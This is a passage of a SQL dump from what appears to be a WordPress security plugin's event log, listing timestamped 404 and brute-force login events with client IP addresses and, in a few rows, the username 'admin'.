13:15:23','104.42.54.54',NULL,NULL),(66714,'four_oh_four','2020-04-21 08:15:24','2020-04-21 13:15:24','104.42.54.54',NULL,NULL),(66715,'four_oh_four','2020-04-21 08:15:43','2020-04-21 13:15:43','104.42.54.54',NULL,NULL),(66716,'four_oh_four','2020-04-21 08:15:49','2020-04-21 13:15:49','104.42.54.54',NULL,NULL),(66717,'four_oh_four','2020-04-21 08:56:05','2020-04-21 13:56:05','91.207.102.156',NULL,NULL),(66718,'four_oh_four','2020-04-21 08:56:13','2020-04-21 13:56:13','91.207.102.156',NULL,NULL),(66719,'four_oh_four','2020-04-21 08:56:17','2020-04-21 13:56:17','91.207.102.156',NULL,NULL),(66720,'four_oh_four','2020-04-21 08:56:21','2020-04-21 13:56:21','91.207.102.156',NULL,NULL),(66721,'four_oh_four','2020-04-21 08:56:26','2020-04-21 13:56:26','91.207.102.156',NULL,NULL),(66722,'four_oh_four','2020-04-21 08:56:31','2020-04-21 13:56:31','91.207.102.156',NULL,NULL),(66723,'four_oh_four','2020-04-21 08:56:35','2020-04-21 13:56:35','91.207.102.156',NULL,NULL),(66724,'four_oh_four','2020-04-21 08:56:40','2020-04-21 13:56:40','91.207.102.156',NULL,NULL),(66725,'four_oh_four','2020-04-21 08:56:45','2020-04-21 13:56:45','91.207.102.156',NULL,NULL),(66726,'four_oh_four','2020-04-21 14:02:33','2020-04-21 19:02:33','184.154.139.18',NULL,NULL),(66727,'four_oh_four','2020-04-21 14:30:44','2020-04-21 19:30:44','3.213.96.39',NULL,NULL),(66728,'four_oh_four','2020-04-21 14:30:45','2020-04-21 19:30:45','3.213.96.39',NULL,NULL),(66729,'four_oh_four','2020-04-21 14:30:46','2020-04-21 19:30:46','3.213.96.39',NULL,NULL),(66730,'four_oh_four','2020-04-21 14:30:48','2020-04-21 19:30:48','3.213.96.39',NULL,NULL),(66731,'four_oh_four','2020-04-21 14:30:52','2020-04-21 19:30:52','52.201.182.91',NULL,NULL),(66732,'four_oh_four','2020-04-21 14:30:53','2020-04-21 19:30:53','52.201.182.91',NULL,NULL),(66733,'four_oh_four','2020-04-21 17:17:58','2020-04-21 22:17:58','66.249.75.39',NULL,NULL),(66734,'four_oh_four','2020-04-21 17:36:21','2020-04-21 22:36:21','65.154.226.220',NULL,NULL),(66735,'four_oh_four','2020-04-21 17:36:31','2020-04-21 22:36:31','65.154.226.220',NULL,NULL),(66736,'four_oh_four','2020-04-21 22:11:15','2020-04-22 03:11:15','27.34.48.197',NULL,NULL),(66737,'four_oh_four','2020-04-21 23:19:41','2020-04-22 04:19:41','157.55.39.241',NULL,NULL),(66738,'four_oh_four','2020-04-22 01:51:08','2020-04-22 06:51:08','83.31.17.34',NULL,NULL),(66739,'four_oh_four','2020-04-22 07:59:10','2020-04-22 12:59:10','132.148.80.15',NULL,NULL),(66740,'four_oh_four','2020-04-22 08:55:29','2020-04-22 13:55:29','51.38.115.166',NULL,NULL),(66741,'four_oh_four','2020-04-22 11:50:50','2020-04-22 16:50:50','40.77.167.136',NULL,NULL),(66742,'four_oh_four','2020-04-22 14:11:01','2020-04-22 19:11:01','184.154.139.17',NULL,NULL),(66743,'four_oh_four','2020-04-22 14:35:29','2020-04-22 19:35:29','3.213.96.39',NULL,NULL),(66744,'four_oh_four','2020-04-22 14:35:32','2020-04-22 19:35:32','3.213.96.39',NULL,NULL),(66745,'four_oh_four','2020-04-22 14:35:33','2020-04-22 19:35:33','3.213.96.39',NULL,NULL),(66746,'four_oh_four','2020-04-22 14:35:35','2020-04-22 19:35:35','3.213.96.39',NULL,NULL),(66747,'four_oh_four','2020-04-22 14:35:37','2020-04-22 19:35:37','3.213.96.39',NULL,NULL),(66748,'four_oh_four','2020-04-22 14:35:39','2020-04-22 19:35:39','3.213.96.39',NULL,NULL),(66749,'four_oh_four','2020-04-22 16:03:43','2020-04-22 21:03:43','88.80.53.152',NULL,NULL),(66750,'four_oh_four','2020-04-22 17:12:56','2020-04-22 22:12:56','114.119.161.39',NULL,NULL),(66751,'four_oh_four','2020-04-22 19:06:16','2020-04-23 00:06:16','207.46.13.13',NULL,NULL),(66752,'four_oh_four','2020-04-22 23:08:00','2020-04-23 04:08:00','106.75.22.46',NULL,NULL),(66753,'four_oh_four','2020-04-23 02:54:44','2020-04-23 07:54:44','35.209.26.191',NULL,NULL),(66754,'four_oh_four','2020-04-23 05:33:23','2020-04-23 10:33:23','40.77.167.14',NULL,NULL),(66755,'four_oh_four','2020-04-23 05:43:47','2020-04-23 10:43:47','207.46.13.126',NULL,NULL),(66756,'four_oh_four','2020-04-23 06:21:39','2020-04-23 11:21:39','36.79.255.63',NULL,NULL),(66757,'four_oh_four','2020-04-23 06:21:54','2020-04-23 11:21:54','36.79.255.63',NULL,NULL),(66758,'four_oh_four','2020-04-23 14:08:37','2020-04-23 19:08:37','184.154.139.18',NULL,NULL),(66759,'four_oh_four','2020-04-23 20:20:54','2020-04-24 01:20:54','3.94.137.21',NULL,NULL),(66760,'four_oh_four','2020-04-23 20:20:55','2020-04-24 01:20:55','3.213.96.39',NULL,NULL),(66761,'four_oh_four','2020-04-23 20:20:57','2020-04-24 01:20:57','3.94.137.21',NULL,NULL),(66762,'four_oh_four','2020-04-23 20:20:57','2020-04-24 01:20:57','3.213.96.39',NULL,NULL),(66763,'four_oh_four','2020-04-23 20:21:02','2020-04-24 01:21:02','52.201.182.91',NULL,NULL),(66764,'four_oh_four','2020-04-23 20:21:03','2020-04-24 01:21:03','52.201.182.91',NULL,NULL),(66765,'four_oh_four','2020-04-24 03:24:15','2020-04-24 08:24:15','204.101.161.159',NULL,NULL),(66766,'four_oh_four','2020-04-24 03:24:45','2020-04-24 08:24:45','204.101.161.159',NULL,NULL),(66767,'four_oh_four','2020-04-24 05:28:32','2020-04-24 10:28:32','17.58.97.76',NULL,NULL),(66768,'four_oh_four','2020-04-24 05:28:32','2020-04-24 10:28:32','17.58.97.76',NULL,NULL),(66769,'four_oh_four','2020-04-24 14:02:06','2020-04-24 19:02:06','184.154.139.3',NULL,NULL),(66770,'four_oh_four','2020-04-24 16:29:49','2020-04-24 21:29:49','40.77.167.91',NULL,NULL),(66771,'four_oh_four','2020-04-24 19:29:41','2020-04-25 00:29:41','68.66.224.52',NULL,NULL),(66772,'four_oh_four','2020-04-24 20:30:59','2020-04-25 01:30:59','40.77.167.91',NULL,NULL),(66773,'four_oh_four','2020-04-24 20:39:54','2020-04-25 01:39:54','3.94.137.21',NULL,NULL),(66774,'four_oh_four','2020-04-24 20:39:57','2020-04-25 01:39:57','3.94.137.21',NULL,NULL),(66775,'four_oh_four','2020-04-24 20:39:57','2020-04-25 01:39:57','3.213.96.39',NULL,NULL),(66776,'four_oh_four','2020-04-24 20:39:59','2020-04-25 01:39:59','3.213.96.39',NULL,NULL),(66777,'four_oh_four','2020-04-24 20:40:02','2020-04-25 01:40:02','3.213.96.39',NULL,NULL),(66778,'four_oh_four','2020-04-24 20:40:03','2020-04-25 01:40:03','3.213.96.39',NULL,NULL),(66779,'four_oh_four','2020-04-24 20:41:24','2020-04-25 01:41:24','99.79.65.118',NULL,NULL),(66780,'four_oh_four','2020-04-24 20:41:25','2020-04-25 01:41:25','99.79.65.118',NULL,NULL),(66781,'four_oh_four','2020-04-24 20:41:28','2020-04-25 01:41:28','99.79.65.118',NULL,NULL),(66782,'four_oh_four','2020-04-24 20:41:29','2020-04-25 01:41:29','99.79.65.118',NULL,NULL),(66783,'four_oh_four','2020-04-24 20:41:46','2020-04-25 01:41:46','99.79.65.118',NULL,NULL),(66784,'four_oh_four','2020-04-24 20:41:51','2020-04-25 01:41:51','99.79.65.118',NULL,NULL),(66785,'four_oh_four','2020-04-25 01:20:34','2020-04-25 06:20:34','142.44.246.156',NULL,NULL),(66786,'four_oh_four','2020-04-25 01:20:41','2020-04-25 06:20:41','142.44.246.156',NULL,NULL),(66787,'four_oh_four','2020-04-25 03:40:09','2020-04-25 08:40:09','171.22.26.65',NULL,NULL),(66788,'four_oh_four','2020-04-25 08:08:02','2020-04-25 13:08:02','51.68.82.161',NULL,NULL),(66789,'four_oh_four','2020-04-25 12:24:41','2020-04-25 17:24:41','138.128.46.64',NULL,NULL),(66790,'four_oh_four','2020-04-25 14:03:35','2020-04-25 19:03:35','184.154.139.18',NULL,NULL),(66791,'four_oh_four','2020-04-25 16:05:59','2020-04-25 21:05:59','118.31.111.216',NULL,NULL),(66792,'four_oh_four','2020-04-25 20:54:31','2020-04-26 01:54:31','47.105.170.18',NULL,NULL),(66793,'four_oh_four','2020-04-25 21:15:29','2020-04-26 02:15:29','52.201.182.91',NULL,NULL),(66794,'four_oh_four','2020-04-25 21:15:32','2020-04-26 02:15:32','3.213.96.39',NULL,NULL),(66795,'four_oh_four','2020-04-25 21:15:32','2020-04-26 02:15:32','52.201.182.91',NULL,NULL),(66796,'four_oh_four','2020-04-25 21:15:35','2020-04-26 02:15:35','3.213.96.39',NULL,NULL),(66797,'four_oh_four','2020-04-25 21:15:37','2020-04-26 02:15:37','3.94.137.21',NULL,NULL),(66798,'four_oh_four','2020-04-25 21:15:38','2020-04-26 02:15:38','3.94.137.21',NULL,NULL),(66799,'four_oh_four','2020-04-26 02:41:15','2020-04-26 07:41:15','162.241.61.5',NULL,NULL),(66800,'four_oh_four','2020-04-26 04:22:25','2020-04-26 09:22:25','50.87.253.176',NULL,NULL),(66801,'four_oh_four','2020-04-26 14:09:53','2020-04-26 19:09:53','184.154.139.18',NULL,NULL),(66802,'four_oh_four','2020-04-26 14:59:44','2020-04-26 19:59:44','185.220.101.38',NULL,NULL),(66803,'four_oh_four','2020-04-26 14:59:50','2020-04-26 19:59:50','185.220.101.38',NULL,NULL),(66804,'four_oh_four','2020-04-26 14:59:56','2020-04-26 19:59:56','185.220.101.38',NULL,NULL),(66805,'four_oh_four','2020-04-26 15:00:03','2020-04-26 20:00:03','185.220.101.38',NULL,NULL),(66806,'four_oh_four','2020-04-26 15:00:11','2020-04-26 20:00:11','185.220.101.38',NULL,NULL),(66807,'four_oh_four','2020-04-26 15:00:19','2020-04-26 20:00:19','185.220.101.38',NULL,NULL),(66808,'four_oh_four','2020-04-26 15:00:24','2020-04-26 20:00:24','185.220.101.38',NULL,NULL),(66809,'four_oh_four','2020-04-26 15:00:28','2020-04-26 20:00:28','185.220.101.38',NULL,NULL),(66810,'four_oh_four','2020-04-26 15:00:34','2020-04-26 20:00:34','185.220.101.38',NULL,NULL),(66811,'four_oh_four','2020-04-26 15:00:40','2020-04-26 20:00:40','185.220.101.38',NULL,NULL),(66812,'four_oh_four','2020-04-26 15:00:45','2020-04-26 20:00:45','185.220.101.38',NULL,NULL),(66813,'four_oh_four','2020-04-26 15:00:52','2020-04-26 20:00:52','185.220.101.38',NULL,NULL),(66814,'four_oh_four','2020-04-26 15:01:02','2020-04-26 20:01:02','185.220.101.38',NULL,NULL),(66815,'four_oh_four','2020-04-26 15:01:16','2020-04-26 20:01:16','185.220.101.38',NULL,NULL),(66816,'four_oh_four','2020-04-26 15:01:22','2020-04-26 20:01:22','185.220.101.38',NULL,NULL),(66817,'four_oh_four','2020-04-26 15:01:31','2020-04-26 20:01:31','185.220.101.207',NULL,NULL),(66818,'four_oh_four','2020-04-26 15:01:39','2020-04-26 20:01:39','185.220.101.207',NULL,NULL),(66819,'four_oh_four','2020-04-26 18:47:11','2020-04-26 23:47:11','198.57.247.223',NULL,NULL),(66820,'four_oh_four','2020-04-26 20:28:20','2020-04-27 01:28:20','157.55.39.207',NULL,NULL),(66821,'four_oh_four','2020-04-26 21:54:15','2020-04-27 02:54:15','3.23.102.136',NULL,NULL),(66822,'four_oh_four','2020-04-26 21:54:20','2020-04-27 02:54:20','3.23.102.136',NULL,NULL),(66823,'four_oh_four','2020-04-26 21:54:41','2020-04-27 02:54:41','3.23.102.136',NULL,NULL),(66824,'four_oh_four','2020-04-26 21:54:52','2020-04-27 02:54:52','3.23.102.136',NULL,NULL),(66825,'four_oh_four','2020-04-26 21:54:55','2020-04-27 02:54:55','3.23.102.136',NULL,NULL),(66826,'four_oh_four','2020-04-26 21:54:56','2020-04-27 02:54:56','3.23.102.136',NULL,NULL),(66827,'four_oh_four','2020-04-26 22:18:46','2020-04-27 03:18:46','162.243.29.24',NULL,NULL),(66828,'four_oh_four','2020-04-26 22:29:02','2020-04-27 03:29:02','3.94.137.21',NULL,NULL),(66829,'four_oh_four','2020-04-26 22:29:04','2020-04-27 03:29:04','52.201.182.91',NULL,NULL),(66830,'four_oh_four','2020-04-26 22:29:05','2020-04-27 03:29:05','3.94.137.21',NULL,NULL),(66831,'four_oh_four','2020-04-26 22:29:06','2020-04-27 03:29:06','52.201.182.91',NULL,NULL),(66832,'four_oh_four','2020-04-26 22:29:10','2020-04-27 03:29:10','3.213.96.39',NULL,NULL),(66833,'four_oh_four','2020-04-26 22:29:11','2020-04-27 03:29:11','3.213.96.39',NULL,NULL),(66834,'four_oh_four','2020-04-26 22:34:07','2020-04-27 03:34:07','118.31.111.216',NULL,NULL),(66835,'four_oh_four','2020-04-26 23:35:16','2020-04-27 04:35:16','90.154.102.15',NULL,NULL),(66836,'four_oh_four','2020-04-26 23:35:19','2020-04-27 04:35:19','90.154.102.15',NULL,NULL),(66837,'four_oh_four','2020-04-27 00:41:42','2020-04-27 05:41:42','66.249.75.37',NULL,NULL),(66838,'four_oh_four','2020-04-27 06:40:32','2020-04-27 11:40:32','162.243.29.24',NULL,NULL),(66839,'four_oh_four','2020-04-27 09:49:47','2020-04-27 14:49:47','39.101.205.97',NULL,NULL),(66840,'four_oh_four','2020-04-27 10:02:15','2020-04-27 15:02:15','193.106.30.99',NULL,NULL),(66841,'four_oh_four','2020-04-27 13:02:36','2020-04-27 18:02:36','185.107.45.180',NULL,NULL),(66842,'four_oh_four','2020-04-27 13:02:38','2020-04-27 18:02:38','185.107.45.180',NULL,NULL),(66843,'four_oh_four','2020-04-27 13:02:41','2020-04-27 18:02:41','185.107.45.180',NULL,NULL),(66844,'four_oh_four','2020-04-27 13:02:42','2020-04-27 18:02:42','185.107.45.180',NULL,NULL),(66845,'four_oh_four','2020-04-27 13:02:43','2020-04-27 18:02:43','185.107.45.180',NULL,NULL),(66846,'four_oh_four','2020-04-27 13:02:45','2020-04-27 18:02:45','185.107.45.180',NULL,NULL),(66847,'four_oh_four','2020-04-27 13:02:46','2020-04-27 18:02:46','185.107.45.180',NULL,NULL),(66848,'four_oh_four','2020-04-27 13:02:48','2020-04-27 18:02:48','185.107.45.180',NULL,NULL),(66849,'four_oh_four','2020-04-27 13:02:49','2020-04-27 18:02:49','185.107.45.180',NULL,NULL),(66850,'four_oh_four','2020-04-27 13:02:50','2020-04-27 18:02:50','185.107.45.180',NULL,NULL),(66851,'four_oh_four','2020-04-27 13:02:57','2020-04-27 18:02:57','185.107.45.180',NULL,NULL),(66852,'four_oh_four','2020-04-27 13:03:01','2020-04-27 18:03:01','185.107.45.180',NULL,NULL),(66853,'four_oh_four','2020-04-27 13:03:06','2020-04-27 18:03:06','185.107.45.180',NULL,NULL),(66854,'four_oh_four','2020-04-27 13:03:09','2020-04-27 18:03:09','185.107.45.180',NULL,NULL),(66855,'four_oh_four','2020-04-27 13:03:14','2020-04-27 18:03:14','185.107.45.180',NULL,NULL),(66856,'four_oh_four','2020-04-27 13:03:15','2020-04-27 18:03:15','185.107.45.180',NULL,NULL),(66857,'four_oh_four','2020-04-27 14:01:52','2020-04-27 19:01:52','184.154.139.17',NULL,NULL),(66858,'four_oh_four','2020-04-27 21:55:15','2020-04-28 02:55:15','188.143.235.92',NULL,NULL),(66859,'four_oh_four','2020-04-27 21:55:18','2020-04-28 02:55:18','188.143.235.92',NULL,NULL),(66860,'four_oh_four','2020-04-27 23:40:36','2020-04-28 04:40:36','52.201.182.91',NULL,NULL),(66861,'four_oh_four','2020-04-27 23:40:37','2020-04-28 04:40:37','3.94.137.21',NULL,NULL),(66862,'four_oh_four','2020-04-27 23:40:39','2020-04-28 04:40:39','52.201.182.91',NULL,NULL),(66863,'four_oh_four','2020-04-27 23:40:39','2020-04-28 04:40:39','3.94.137.21',NULL,NULL),(66864,'four_oh_four','2020-04-27 23:40:44','2020-04-28 04:40:44','52.201.182.91',NULL,NULL),(66865,'four_oh_four','2020-04-27 23:40:45','2020-04-28 04:40:45','52.201.182.91',NULL,NULL),(66866,'four_oh_four','2020-04-28 01:29:09','2020-04-28 06:29:09','27.50.21.153',NULL,NULL),(66867,'four_oh_four','2020-04-28 03:43:13','2020-04-28 08:43:13','45.9.148.213',NULL,NULL),(66868,'four_oh_four','2020-04-28 03:43:17','2020-04-28 08:43:17','45.9.148.213',NULL,NULL),(66869,'four_oh_four','2020-04-28 03:43:32','2020-04-28 08:43:32','45.9.148.213',NULL,NULL),(66870,'four_oh_four','2020-04-28 03:43:35','2020-04-28 08:43:35','45.9.148.213',NULL,NULL),(66871,'four_oh_four','2020-04-28 03:43:37','2020-04-28 08:43:37','45.9.148.213',NULL,NULL),(66872,'four_oh_four','2020-04-28 03:43:39','2020-04-28 08:43:39','45.9.148.213',NULL,NULL),(66873,'four_oh_four','2020-04-28 03:43:42','2020-04-28 08:43:42','45.9.148.213',NULL,NULL),(66874,'four_oh_four','2020-04-28 03:43:45','2020-04-28 08:43:45','45.9.148.213',NULL,NULL),(66875,'four_oh_four','2020-04-28 03:43:47','2020-04-28 08:43:47','45.9.148.213',NULL,NULL),(66876,'four_oh_four','2020-04-28 03:43:50','2020-04-28 08:43:50','45.9.148.213',NULL,NULL),(66877,'four_oh_four','2020-04-28 03:43:53','2020-04-28 08:43:53','45.9.148.213',NULL,NULL),(66878,'four_oh_four','2020-04-28 03:43:57','2020-04-28 08:43:57','45.9.148.213',NULL,NULL),(66879,'four_oh_four','2020-04-28 03:45:05','2020-04-28 08:45:05','45.9.148.213',NULL,NULL),(66880,'four_oh_four','2020-04-28 03:45:57','2020-04-28 08:45:57','45.9.148.213',NULL,NULL),(66881,'four_oh_four','2020-04-28 06:27:48','2020-04-28 11:27:48','104.227.97.122',NULL,NULL),(66882,'four_oh_four','2020-04-28 13:47:28','2020-04-28 18:47:28','13.66.139.0',NULL,NULL),(66883,'four_oh_four','2020-04-28 14:09:53','2020-04-28 19:09:53','184.154.139.17',NULL,NULL),(66884,'four_oh_four','2020-04-28 15:32:33','2020-04-28 20:32:33','209.54.43.202',NULL,NULL),(66885,'four_oh_four','2020-04-28 15:32:34','2020-04-28 20:32:34','209.54.43.202',NULL,NULL),(66886,'four_oh_four','2020-04-28 15:32:35','2020-04-28 20:32:35','209.54.43.202',NULL,NULL),(66887,'four_oh_four','2020-04-28 15:32:38','2020-04-28 20:32:38','209.54.43.202',NULL,NULL),(66888,'four_oh_four','2020-04-28 15:32:39','2020-04-28 20:32:39','209.54.43.202',NULL,NULL),(66889,'four_oh_four','2020-04-28 15:32:41','2020-04-28 20:32:41','209.54.43.202',NULL,NULL),(66890,'four_oh_four','2020-04-28 15:32:43','2020-04-28 20:32:43','209.54.43.202',NULL,NULL),(66891,'four_oh_four','2020-04-28 15:32:44','2020-04-28 20:32:44','209.54.43.202',NULL,NULL),(66892,'four_oh_four','2020-04-28 15:32:45','2020-04-28 20:32:45','209.54.43.202',NULL,NULL),(66893,'four_oh_four','2020-04-28 15:32:46','2020-04-28 20:32:46','209.54.43.202',NULL,NULL),(66894,'four_oh_four','2020-04-28 15:32:47','2020-04-28 20:32:47','209.54.43.202',NULL,NULL),(66895,'four_oh_four','2020-04-28 15:32:49','2020-04-28 20:32:49','209.54.43.202',NULL,NULL),(66896,'four_oh_four','2020-04-28 15:32:52','2020-04-28 20:32:52','209.54.43.202',NULL,NULL),(66897,'four_oh_four','2020-04-28 15:32:54','2020-04-28 20:32:54','209.54.43.202',NULL,NULL),(66898,'four_oh_four','2020-04-28 15:32:55','2020-04-28 20:32:55','209.54.43.202',NULL,NULL),(66899,'four_oh_four','2020-04-28 15:32:57','2020-04-28 20:32:57','209.54.43.202',NULL,NULL),(66900,'four_oh_four','2020-04-28 15:32:58','2020-04-28 20:32:58','209.54.43.202',NULL,NULL),(66901,'four_oh_four','2020-04-28 15:32:59','2020-04-28 20:32:59','209.54.43.202',NULL,NULL),(66902,'four_oh_four','2020-04-28 15:33:01','2020-04-28 20:33:01','209.54.43.202',NULL,NULL),(66903,'four_oh_four','2020-04-28 15:33:02','2020-04-28 20:33:02','209.54.43.202',NULL,NULL),(66904,'four_oh_four','2020-04-28 20:32:58','2020-04-29 01:32:58','52.168.107.64',NULL,NULL),(66905,'brute_force','2020-04-29 14:02:46','2020-04-29 19:02:46','128.127.104.80',NULL,NULL),(66906,'brute_force','2020-04-29 14:02:46','2020-04-29 19:02:46',NULL,NULL,'admin'),(66907,'brute_force','2020-04-29 14:02:52','2020-04-29 19:02:52','128.127.104.80',NULL,NULL),(66908,'brute_force','2020-04-29 14:02:52','2020-04-29 19:02:52',NULL,NULL,'admin'),(66909,'four_oh_four','2020-04-29 14:16:58','2020-04-29 19:16:58','184.154.139.20',NULL,NULL),(66910,'brute_force','2020-04-29 14:42:27','2020-04-29 19:42:27','128.127.104.80',NULL,NULL),(66911,'brute_force','2020-04-29 14:42:27','2020-04-29 19:42:27',NULL,NULL,'admin'),(66912,'brute_force','2020-04-29 14:42:43','2020-04-29 19:42:43','128.127.104.80',NULL,NULL),(66913,'brute_force','2020-04-29 14:42:43','2020-04-29 19:42:43',NULL,NULL,'admin'),(66914,'brute_force','2020-04-29 15:01:45','2020-04-29 20:01:45','128.127.104.80',NULL,NULL),(66915,'brute_force','2020-04-29 15:01:45','2020-04-29 20:01:45',NULL,NULL,'admin'),(66916,'brute_force','2020-04-29 15:03:22','2020-04-29 20:03:22','128.127.104.80',NULL,NULL),(66917,'brute_force','2020-04-29 15:03:22','2020-04-29 20:03:22',NULL,NULL,'admin'),(66918,'brute_force','2020-04-29 15:06:25','2020-04-29 20:06:25','128.127.104.80',NULL,NULL),(66919,'brute_force','2020-04-29 15:06:25','2020-04-29 20:06:25',NULL,NULL,'admin'),(66920,'brute_force','2020-04-29 15:08:53','2020-04-29 20:08:53','202.142.162.50',NULL,NULL),(66921,'brute_force','2020-04-29 15:08:53','2020-04-29 20:08:53',NULL,NULL,'admin'),(66922,'brute_force','2020-04-29 15:12:19','2020-04-29 20:12:19','109.72.230.78',NULL,NULL),(66923,'brute_force','2020-04-29 15:12:19','2020-04-29 20:12:19',NULL,NULL,'admin'),(66924,'four_oh_four','2020-04-29 18:35:45','2020-04-29 23:35:45','3.213.96.39',NULL,NULL),(66925,'four_oh_four','2020-04-29 18:35:45','2020-04-29 23:35:45','3.94.137.21',NULL,NULL),(66926,'four_oh_four','2020-04-29 18:35:48','2020-04-29 23:35:48','3.213.96.39',NULL,NULL),(66927,'four_oh_four','2020-04-29 18:35:48','2020-04-29 23:35:48','3.94.137.21',NULL,NULL),(66928,'four_oh_four','2020-04-29 18:35:53','2020-04-29 23:35:53','3.213.96.39',NULL,NULL),(66929,'four_oh_four','2020-04-29 18:35:54','2020-04-29 23:35:54','3.213.96.39',NULL,NULL),(66930,'four_oh_four','2020-04-29 20:48:21','2020-04-30 01:48:21','185.220.101.175',NULL,NULL),(66931,'four_oh_four','2020-04-29 20:48:32','2020-04-30 01:48:32','147.135.137.51',NULL,NULL),(66932,'four_oh_four','2020-04-29 20:48:35','2020-04-30 01:48:35','147.135.137.51',NULL,NULL),(66933,'four_oh_four','2020-04-29 20:48:40','2020-04-30 01:48:40','147.135.137.51',NULL,NULL),(66934,'four_oh_four','2020-04-29 20:48:43','2020-04-30 01:48:43','147.135.137.51',NULL,NULL),(66935,'four_oh_four','2020-04-29 20:48:46','2020-04-30 01:48:46','147.135.137.51',NULL,NULL),(66936,'four_oh_four','2020-04-29 20:48:49','2020-04-30 01:48:49','147.135.137.51',NULL,NULL),(66937,'four_oh_four','2020-04-29 20:48:52','2020-04-30 01:48:52','147.135.137.51',NULL,NULL),(66938,'four_oh_four','2020-04-29 20:48:55','2020-04-30 01:48:55','147.135.137.51',NULL,NULL),(66939,'four_oh_four','2020-04-29 20:48:58','2020-04-30 01:48:58','147.135.137.51',NULL,NULL),(66940,'four_oh_four','2020-04-29 20:49:01','2020-04-30 01:49:01','147.135.137.51',NULL,NULL),(66941,'four_oh_four','2020-04-29 20:49:04','2020-04-30 01:49:04','147.135.137.51',NULL,NULL),(66942,'four_oh_four','2020-04-29 20:49:07','2020-04-30 01:49:07','147.135.137.51',NULL,NULL),(66943,'four_oh_four','2020-04-29 20:49:09','2020-04-30 01:49:09','147.135.137.51',NULL,NULL),(66944,'four_oh_four','2020-04-29 20:49:12','2020-04-30 01:49:12','147.135.137.51',NULL,NULL),(66945,'four_oh_four','2020-04-29 20:49:15','2020-04-30 01:49:15','147.135.137.51',NULL,NULL),(66946,'four_oh_four','2020-04-29 23:50:49','2020-04-30 04:50:49','51.89.201.8',NULL,NULL),(66947,'four_oh_four','2020-04-29 23:50:50','2020-04-30 04:50:50','51.89.201.8',NULL,NULL),(66948,'four_oh_four','2020-04-29 23:50:51','2020-04-30 04:50:51','51.89.201.8',NULL,NULL),(66949,'four_oh_four','2020-04-29 23:50:52','2020-04-30 04:50:52','51.89.201.8',NULL,NULL),(66950,'four_oh_four','2020-04-29 23:50:53','2020-04-30 04:50:53','51.89.201.8',NULL,NULL),(66951,'four_oh_four','2020-04-29 23:50:54','2020-04-30 04:50:54','51.89.201.8',NULL,NULL),(66952,'four_oh_four','2020-04-29 23:50:55','2020-04-30 04:50:55','51.89.201.8',NULL,NULL),(66953,'four_oh_four','2020-04-29 23:50:56','2020-04-30 04:50:56','51.89.201.8',NULL,NULL),(66954,'four_oh_four','2020-04-29 23:50:56','2020-04-30 04:50:56','51.89.201.8',NULL,NULL),(66955,'four_oh_four','2020-04-29 23:50:57','2020-04-30 04:50:57','51.89.201.8',NULL,NULL),(66956,'four_oh_four','2020-04-29 23:51:00','2020-04-30 04:51:00','51.89.201.8',NULL,NULL),(66957,'four_oh_four','2020-04-29 23:51:02','2020-04-30 04:51:02','51.89.201.8',NULL,NULL),(66958,'four_oh_four','2020-04-29 23:51:03','2020-04-30 04:51:03','51.89.201.8',NULL,NULL),(66959,'four_oh_four','2020-04-29 23:51:04','2020-04-30 04:51:04','51.89.201.8',NULL,NULL),(66960,'four_oh_four','2020-04-29 23:51:05','2020-04-30 04:51:05','51.89.201.8',NULL,NULL),(66961,'four_oh_four','2020-04-29 23:51:06','2020-04-30 04:51:06','51.89.201.8',NULL,NULL),(66962,'four_oh_four','2020-04-29 23:51:07','2020-04-30 04:51:07','51.89.201.8',NULL,NULL),(66963,'four_oh_four','2020-04-29 23:51:08','2020-04-30 04:51:08','51.89.201.8',NULL,NULL),(66964,'four_oh_four','2020-04-29 23:51:08','2020-04-30 04:51:08','51.89.201.8',NULL,NULL),(66965,'four_oh_four','2020-04-29 23:51:09','2020-04-30 04:51:09','51.89.201.8',NULL,NULL),(66966,'four_oh_four','2020-04-30 00:59:37','2020-04-30 05:59:37','207.46.13.215',NULL,NULL),(66967,'four_oh_four','2020-04-30 01:56:22','2020-04-30 06:56:22','188.143.235.92',NULL,NULL),(66968,'four_oh_four','2020-04-30 11:05:32','2020-04-30 16:05:32','193.106.30.99',NULL,NULL),(66969,'four_oh_four','2020-04-30 11:25:03','2020-04-30 16:25:03','107.173.230.202',NULL,NULL),(66970,'four_oh_four','2020-04-30 14:09:51','2020-04-30 19:09:51','184.154.139.18',NULL,NULL),(66971,'four_oh_four','2020-04-30 15:13:28','2020-04-30 20:13:28','95.169.7.168',NULL,NULL),(66972,'four_oh_four','2020-04-30 18:50:28','2020-04-30 23:50:28','52.201.182.91',NULL,NULL),(66973,'four_oh_four','2020-04-30 18:50:29','2020-04-30 23:50:29','3.213.96.39',NULL,NULL),(66974,'four_oh_four','2020-04-30 18:50:31','2020-04-30 23:50:31','52.201.182.91',NULL,NULL),(66975,'four_oh_four','2020-04-30 18:50:32','2020-04-30 23:50:32','3.213.96.39',NULL,NULL),(66976,'four_oh_four','2020-04-30 18:50:34','2020-04-30 23:50:34','3.213.96.39',NULL,NULL),(66977,'four_oh_four','2020-04-30 18:50:35','2020-04-30 23:50:35','3.213.96.39',NULL,NULL),(66978,'four_oh_four','2020-04-30 20:00:10','2020-05-01 01:00:10','5.9.145.132',NULL,NULL),(66979,'four_oh_four','2020-04-30 22:25:18','2020-05-01 03:25:18','107.180.109.46',NULL,NULL),(66980,'four_oh_four','2020-04-30 22:48:40','2020-05-01 03:48:40','66.249.75.194',NULL,NULL),(66981,'four_oh_four','2020-05-01 01:27:28','2020-05-01 06:27:28','193.106.30.99',NULL,NULL),(66982,'four_oh_four','2020-05-01 05:17:02','2020-05-01 10:17:02','104.227.97.122',NULL,NULL),(66983,'four_oh_four','2020-05-01 09:38:56','2020-05-01 14:38:56','144.76.162.206',NULL,NULL),(66984,'four_oh_four','2020-05-01 11:01:08','2020-05-01 16:01:08','77.247.127.103',NULL,NULL),(66985,'four_oh_four','2020-05-01 14:09:59','2020-05-01 19:09:59','184.154.139.19',NULL,NULL),(66986,'four_oh_four','2020-05-01 16:32:37','2020-05-01 21:32:37','198.71.237.21',NULL,NULL),(66987,'four_oh_four','2020-05-01 18:56:56','2020-05-01 23:56:56','52.201.182.91',NULL,NULL),(66988,'four_oh_four','2020-05-01 18:56:58','2020-05-01 23:56:58','3.94.137.21',NULL,NULL),(66989,'four_oh_four','2020-05-01 18:56:58','2020-05-01 23:56:58','52.201.182.91',NULL,NULL),(66990,'four_oh_four','2020-05-01 18:57:00','2020-05-01 23:57:00','3.94.137.21',NULL,NULL),(66991,'four_oh_four','2020-05-01 18:57:04','2020-05-01 23:57:04','52.201.182.91',NULL,NULL),(66992,'four_oh_four','2020-05-01 